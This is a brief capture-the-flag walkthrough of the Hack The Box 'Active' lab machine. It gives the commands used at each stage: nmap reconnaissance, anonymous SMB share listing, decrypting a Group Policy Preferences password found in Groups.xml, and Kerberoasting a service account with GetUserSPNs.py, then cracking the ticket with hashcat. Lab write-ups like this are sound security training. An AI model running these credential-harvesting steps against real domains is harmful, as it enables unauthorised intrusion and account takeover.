HTB Active Box Walkthrough

Step-by-step walkthrough of the Active box from Hack The Box.

HTBActive DirectoryKerberoasting

HTB Active Box Walkthrough

Detailed walkthrough of exploiting the Active machine on Hack The Box.

Reconnaissance

Terminal window
nmap -sC -sV -oA active 10.10.10.100

Key findings:

  • SMB shares accessible
  • Active Directory domain
  • Kerberos authentication

Initial Access

SMB Enumeration

Terminal window
smbclient -L //10.10.10.100 -N
smbclient //10.10.10.100/Replication -N

Found interesting file: Groups.xml with encrypted password.

GPP Password Decryption

Terminal window
gpp-decrypt [encrypted_password]

Privilege Escalation

Kerberoasting Attack

Terminal window
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

Crack the TGS ticket with hashcat.

Lessons Learned

  • Always enumerate SMB shares thoroughly
  • GPP passwords are a common finding in older AD environments
  • Kerberoasting is effective against service accounts